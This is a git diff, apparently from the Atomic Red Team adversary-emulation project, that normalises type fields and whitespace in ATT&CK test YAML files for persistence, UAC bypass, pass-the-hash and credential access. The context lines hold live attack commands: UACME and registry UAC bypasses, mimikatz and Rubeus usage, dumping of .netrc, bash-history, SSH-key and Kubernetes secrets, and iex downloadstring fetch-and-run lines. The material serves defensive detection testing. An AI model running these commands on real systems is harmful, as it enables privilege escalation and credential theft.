57aaa6de..83b56c92 100644 --- a/atomics/T1547.009/T1547.009.yaml +++ b/atomics/T1547.009/T1547.009.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: shortcut_file_path: description: shortcut modified and execute - type: Path + type: path default: '%temp%\T1547.009_modified_shortcut.url' executor: command: | diff --git a/atomics/T1547.010/T1547.010.yaml b/atomics/T1547.010/T1547.010.yaml index 5de6919d..be2f2330 100644 --- a/atomics/T1547.010/T1547.010.yaml +++ b/atomics/T1547.010/T1547.010.yaml @@ -3,13 +3,13 @@ display_name: 'Boot or Logon Autostart Execution: Port Monitors' atomic_tests: - name: Add Port Monitor persistence in Registry auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. supported_platforms: - windows input_arguments: monitor_dll: description: Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. - type: Path + type: path default: C:\Path\AtomicRedTeam.dll executor: command: | diff --git a/atomics/T1547.014/T1547.014.yaml b/atomics/T1547.014/T1547.014.yaml index 65752e3a..16cb0ad6 100644 --- a/atomics/T1547.014/T1547.014.yaml +++ b/atomics/T1547.014/T1547.014.yaml @@ -7,17 +7,17 @@ atomic_tests: This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and forcing to run active setup using the "runonce.exe /AlternateShellStartup" command. Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user. - + Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in. The payload will only run once unless the cleanup command is run in between tests. - + [Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/) supported_platforms: - windows input_arguments: payload: description: Payload to run once during login - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: |- @@ -41,7 +41,7 @@ atomic_tests: input_arguments: payload: description: Payload to run once during login - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: |- diff --git a/atomics/T1547.015/T1547.015.yaml b/atomics/T1547.015/T1547.015.yaml index b515826c..56195cbb 100644 --- a/atomics/T1547.015/T1547.015.yaml +++ b/atomics/T1547.015/T1547.015.yaml @@ -9,19 +9,19 @@ atomic_tests: input_arguments: calculator: description: Test program used to imitate a maliciously called program. - type: String + type: string default: calculator.exe settings_json_def: description: Default file for Windows Terminal to replace the default profile with a backdoor to call another program. - type: Path + type: path default: ~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json settings_json_tmp: description: Temp file for Windows Terminal. - type: Path + type: path default: ~\AppData\Local\Temp\settings.json wt_exe: description: Windows Terminal executable. - type: Path + type: path default: ~\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe dependency_executor_name: powershell dependencies: @@ -54,15 +54,15 @@ atomic_tests: input_arguments: scriptfile: description: path to Applescript source to add Safari LoginItem. - type: String + type: string default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa cleanup_script: description: path to Applescript source to delete Safari LoginItem. - type: String + type: string default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa executor: command: | osascript #{scriptfile} cleanup_command: | osascript #{cleanup_script} - name: bash \ No newline at end of file + name: bash diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml index a9cab92e..b9d721fe 100644 --- a/atomics/T1547/T1547.yaml +++ b/atomics/T1547/T1547.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: driver_inf: description: A built-in, already installed windows driver inf - type: Path + type: path default: 'C:\Windows\INF\usbstor.inf' executor: command: | diff --git a/atomics/T1548.001/T1548.001.yaml b/atomics/T1548.001/T1548.001.yaml index 152b4d9d..ce862d7b 100644 --- a/atomics/T1548.001/T1548.001.yaml +++ b/atomics/T1548.001/T1548.001.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: payload: description: hello.c payload - type: Path + type: path default: PathToAtomicsFolder/T1548.001/src/hello.c executor: command: | @@ -36,7 +36,7 @@ atomic_tests: input_arguments: file_to_setuid: description: Path of file to set SetUID flag - type: Path + type: path default: /tmp/evilBinary executor: command: | @@ -57,7 +57,7 @@ atomic_tests: input_arguments: file_to_setuid: description: Path of file to set SetGID flag - type: Path + type: path default: /tmp/evilBinary executor: command: | @@ -79,7 +79,7 @@ atomic_tests: input_arguments: payload: description: cap.c payload - type: Path + type: path default: PathToAtomicsFolder/T1548.001/src/cap.c executor: command: | @@ -100,8 +100,8 @@ atomic_tests: - linux input_arguments: file_to_setcap: - description: Path of file to provide the SetUID capability - type: Path + description: Path of file to provide the SetUID capability + type: path default: /tmp/evilBinary executor: command: | diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index dc88ea28..2464a919 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -30,7 +30,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -50,7 +50,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -70,7 +70,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -91,7 +91,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -112,7 +112,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -136,7 +136,7 @@ atomic_tests: input_arguments: command.to.execute: description: Command to execute - type: String + type: string default: cmd.exe /c notepad.exe executor: command: | @@ -165,22 +165,22 @@ atomic_tests: auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ - + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). - + For example, we can set the windir registry kye to: "cmd /k REM " - + And forcefully run SilentCleanup task: - + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I - + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. supported_platforms: - windows input_arguments: file_path: description: Path to the bat file - type: String + type: string default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat executor: command: | @@ -192,28 +192,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Leo Davidson derivative - + Type: Dll Hijack - + Method: IFileOperation - + Target: \system32\pkgmgr.exe - + Component: DismCore.dll - + Implementation: ucmDismMethod - + UCM Method: UacMethodDISM - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\23 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -238,28 +238,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Enigma0x3 - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\sdclt.exe - + Component: Attacker defined - + Implementation: ucmSdcltIsolatedCommandMethod - + UCM Method: UacMethodShellSdclt - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\31 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -284,28 +284,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: winscripting.blog - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\fodhelper.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodMsSettings2 - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\33 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -330,28 +330,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: James Forshaw - + Type: Shell API - + Method: Environment variables expansion - + Target: \system32\svchost.exe via \system32\schtasks.exe - + Component: Attacker defined - + Implementation: ucmDiskCleanupEnvironmentVariable - + UCM Method: UacMethodDiskSilentCleanup - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\34 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -376,28 +376,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Stefan Kanthak - + Type: Dll Hijack - + Method: .NET Code Profiler - + Target: \system32\mmc.exe - + Component: Attacker defined - + Implementation: ucmCorProfilerMethod - + UCM Method: UacMethodCorProfiler - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\39 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -422,28 +422,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Hashim Jawad - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\WSReset.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodShellWSReset - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\56 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -468,28 +468,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: James Forshaw - + Type: AppInfo ALPC - + Method: RAiLaunchAdminProcess and DebugObject - + Target: Attacker defined - + Component: Attacker defined - + Implementation: ucmDebugObjectMethod - + UCM Method: UacMethodDebugObject - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\59 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -514,28 +514,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Enigma0x3/bytecode77 derivative by Nassim Asrir - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\slui.exe, \system32\changepk.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodDebugObject - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\61 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -602,7 +602,7 @@ atomic_tests: description: | Disable User Account Conrol (UAC) for admin by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0. - + [MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), [Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), [Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat) @@ -628,11 +628,11 @@ atomic_tests: input_arguments: commandpath: description: Registry path - type: String + type: string default: 'HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command' commandtorun: description: Command to run - type: String + type: string default: 'C:\Windows\System32\cmd.exe /c start cmd.exe' executor: command: |- diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index e7e3ba93..5b046e6c 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: user_name: description: username - type: String + type: string default: Administrator ntlm: description: ntlm hash - type: String + type: string default: cc36cf7a8514893efccd3324464tkg1a domain: description: domain - type: String + type: string default: '%userdnsdomain%' mimikatz_path: description: mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -53,23 +53,23 @@ atomic_tests: input_arguments: user_name: description: username - type: String + type: string default: Administrator crackmapexec_exe: description: crackmapexec windows executable - type: Path + type: path default: C:\CrackMapExecWin\crackmapexec.exe command: description: command to execute - type: String + type: string default: whoami ntlm: description: command - type: String + type: string default: cc36cf7a8514893efccd3324464tkg1a domain: description: domain - type: String + type: string default: '%userdnsdomain%' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index afe8a9c3..c8efd933 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: ticket: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) - type: String - default: null + type: string + default: mimikatz_exe: description: Path of the Mimikatz binary - type: Path + type: path default: PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: @@ -47,27 +47,27 @@ atomic_tests: default: localhost user_name: description: username associated with the ticket (privileged account not required) - type: String + type: string default: Administrator password: description: password for user_name - type: String + type: string default: Password domain: description: domain - type: String + type: string default: $Env:USERDOMAIN rubeus_path: description: Path of the Rubeus binary - type: Path + type: path default: $Env:TEMP\rubeus.exe rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe psexec_path: description: Path of the PsExec binary - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: @@ -88,7 +88,7 @@ atomic_tests: Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force executor: name: powershell - elevation_required: true + elevation_required: true command: | #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi Set-Location $env:TEMP diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 4440b76c..7e4dd424 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -22,7 +22,7 @@ atomic_tests: input_arguments: file_path: description: Path to search - type: String + type: string default: / executor: command: | @@ -59,13 +59,13 @@ atomic_tests: This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. supported_platforms: - - macos - - linux + - macos + - linux executor: name: bash elevation_required: false # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false. - command: | + command: | for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done - name: WinPwn - sensitivefiles auto_generated_guid: 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 @@ -140,5 +140,4 @@ atomic_tests: $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') SharpCloud -consoleoutput -noninteractive - name: powershell - + name: powershell diff --git a/atomics/T1552.003/T1552.003.yaml b/atomics/T1552.003/T1552.003.yaml index d864ae54..3e9a7f9c 100644 --- a/atomics/T1552.003/T1552.003.yaml +++ b/atomics/T1552.003/T1552.003.yaml @@ -11,17 +11,17 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: ~/loot.txt bash_history_grep_args: description: grep arguments that filter out specific commands we want to capture - type: Path + type: path default: -e '-p ' -e 'pass' -e 'ssh' bash_history_filename: description: Path of the bash history file to capture - type: Path + type: path default: ~/.bash_history executor: command: | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index 95711c90..1c0360f7 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -23,11 +23,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_file: description: Output file containing locations of SSH key files - type: Path + type: path default: /tmp/keyfile_locations.txt executor: command: | @@ -44,11 +44,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_folder: description: Output folder containing copies of SSH private key files - type: Path + type: path default: /tmp/art-staging executor: command: | @@ -67,11 +67,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_folder: description: Output folder containing copies of SSH private key files - type: Path + type: path default: /tmp/art-staging executor: command: | @@ -90,11 +90,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from - type: Path + type: path default: / output_folder: description: Output folder containing a copy of the .gnupg directory - type: Path + type: path default: /tmp/GnuPG executor: command: | @@ -138,19 +138,19 @@ atomic_tests: input_arguments: adfs_service_account_name: description: Name of the ADFS service account - type: String + type: string default: "adfs_svc" replication_user: description: Username with replication rights. It can be the Domain Admin running the script - type: String + type: string default: "Administrator" replication_password: description: Password of replication_username - type: String + type: string default: "ReallyStrongPassword" adfs_server_name: description: Name of an ADFS server - type: String + type: string default: "sts.contoso.com" dependency_executor_name: powershell dependencies: @@ -209,18 +209,18 @@ atomic_tests: input_arguments: output: description: file path to export to - type: Path + type: path default: c:\temp\atomic.pfx password: description: password for cert - type: String + type: string default: password executor: command: | - IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) - certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output} + IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) + certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output} cleanup_command: | - Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item + Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item name: powershell elevation_required: true - name: Export Root Certificate with Export-PFXCertificate @@ -233,7 +233,7 @@ atomic_tests: input_arguments: pfx_path: description: output path of the certificate - type: String + type: string default: $env:Temp\atomicredteam.pfx executor: command: | @@ -259,7 +259,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: $env:Temp\AtomicRedTeam.cer executor: command: | @@ -285,7 +285,7 @@ atomic_tests: input_arguments: mimikatz_exe: description: Path of the Mimikatz binary - type: String + type: string default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1552.005/T1552.005.yaml b/atomics/T1552.005/T1552.005.yaml index d63480da..3c886630 100644 --- a/atomics/T1552.005/T1552.005.yaml +++ b/atomics/T1552.005/T1552.005.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az dependency_executor_name: powershell dependencies: @@ -54,7 +54,7 @@ atomic_tests: input_arguments: output_file: description: File to output metadata to - type: String + type: string default: $env:temp\T1552.005Test2.txt executor: command: | diff --git a/atomics/T1552.006/T1552.006.yaml b/atomics/T1552.006/T1552.006.yaml index 750b7269..372d33d4 100644 --- a/atomics/T1552.006/T1552.006.yaml +++ b/atomics/T1552.006/T1552.006.yaml @@ -33,11 +33,11 @@ atomic_tests: input_arguments: gpp_script_url: description: URL of the Get-GPPPassword PowerShell Script - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1 gpp_script_path: description: Path to the Get-GPPPassword PowerShell Script - type: Path + type: path default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1 dependency_executor_name: powershell dependencies: diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index d912b0f6..e59b9eb7 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -1,105 +1,105 @@ -attack_technique: T1552.007 -display_name: Kubernetes List Secrets -atomic_tests: -- name: List All Secrets +attack_technique: T1552.007 +display_name: Kubernetes List Secrets +atomic_tests: +- name: List All Secrets auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11 - description: | - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. - [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). - - This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster. - supported_platforms: - - containers - dependencies: - - description: | - kubectl must be installed - prereq_command: | - which kubectl - get_prereq_command: | - echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)" - executor: - command: | - kubectl get secrets --all-namespaces - name: bash - elevation_required: false - -- name: ListSecrets - auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - description: | - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. - supported_platforms: - - containers - input_arguments: - namespace: - description: K8s namespace to list - type: String - default: default - dependencies: - - description: | - kubectl must be installed - get_prereq_command: | - echo "kubectl must be installed manually" - prereq_command: | - which kubectl - executor: - command: | - kubectl get secrets -n #{namespace} - name: bash - elevation_required: false - -- name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - description: | - Access the Kubernetes service account access token stored within a container in a cluster. - - supported_platforms: - - linux - - dependency_executor_name: sh - dependencies: - - description: Verify docker is installed. - prereq_command: | - which docker - get_prereq_command: | - if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - - - description: Verify docker service is running. - prereq_command: | - sudo systemctl status docker - get_prereq_command: | - sudo systemctl start docker - - - description: Verify kind is in the path. - prereq_command: | - which kind - get_prereq_command: | - curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 - chmod +x ./kind - mv kind /usr/bin/kind - - - description: Verify kind-atomic-cluster is created - prereq_command: | - sudo kind get clusters - get_prereq_command: | - sudo kind create cluster --name atomic-cluster - - - description: Verify kubectl is in path - prereq_command: | - which kubectl - get_prereq_command: | - curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" - chmod +x ./kubectl - mv kubectl /usr/bin/kubectl - - - description: Verify atomic-pod is running. - prereq_command: | - kubectl --context kind-atomic-cluster get pods |grep atomic-pod - get_prereq_command: | - kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - - executor: - command: | - kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - name: sh - cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod + description: | + A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. + [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). + + This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster. + supported_platforms: + - containers + dependencies: + - description: | + kubectl must be installed + prereq_command: | + which kubectl + get_prereq_command: | + echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)" + executor: + command: | + kubectl get secrets --all-namespaces + name: bash + elevation_required: false + +- name: ListSecrets + auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + description: | + A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + supported_platforms: + - containers + input_arguments: + namespace: + description: K8s namespace to list + type: string + default: default + dependencies: + - description: | + kubectl must be installed + get_prereq_command: | + echo "kubectl must be installed manually" + prereq_command: | + which kubectl + executor: + command: | + kubectl get secrets -n #{namespace} + name: bash + elevation_required: false + +- name: Cat the contents of a Kubernetes service account token file + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + description: | + Access the Kubernetes service account access token stored within a container in a cluster. + + supported_platforms: + - linux + + dependency_executor_name: sh + dependencies: + - description: Verify docker is installed. + prereq_command: | + which docker + get_prereq_command: | + if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi + + - description: Verify docker service is running. + prereq_command: | + sudo systemctl status docker + get_prereq_command: | + sudo systemctl start docker + + - description: Verify kind is in the path. + prereq_command: | + which kind + get_prereq_command: | + curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 + chmod +x ./kind + mv kind /usr/bin/kind + + - description: Verify kind-atomic-cluster is created + prereq_command: | + sudo kind get clusters + get_prereq_command: | + sudo kind create cluster --name atomic-cluster + + - description: Verify kubectl is in path + prereq_command: | + which kubectl + get_prereq_command: | + curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" + chmod +x ./kubectl + mv kubectl /usr/bin/kubectl + + - description: Verify atomic-pod is running. + prereq_command: | + kubectl --context kind-atomic-cluster get pods |grep atomic-pod + get_prereq_command: | + kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity + + executor: + command: | + kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token + name: sh + cleanup_command: | + kubectl --context kind-atomic-cluster delete pod atomic-pod diff --git a/atomics/T1552/T1552.yaml b/atomics/T1552/T1552.yaml index 22f403b6..afe1bfbe 100644 --- a/atomics/T1552/T1552.yaml +++ b/atomics/T1552/T1552.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1552/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: @@ -33,11 +33,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | export AWS_REGION=#{aws_region} @@ -48,10 +48,10 @@ atomic_tests: ./stratus detonate aws.credential-access.ec2-get-password-data --force cleanup_command: | export AWS_REGION=#{aws_region} - + echo "Cleanup detonation" cd #{stratus_path} ./stratus cleanup --all rm -rf stratus* name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml index eaf74747..5ee7e691 100644 --- a/atomics/T1553.001/T1553.001.yaml +++ b/atomics/T1553.001/T1553.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: app_path: description: Path to app to be used - type: Path + type: path default: myapp.app executor: command: | diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index 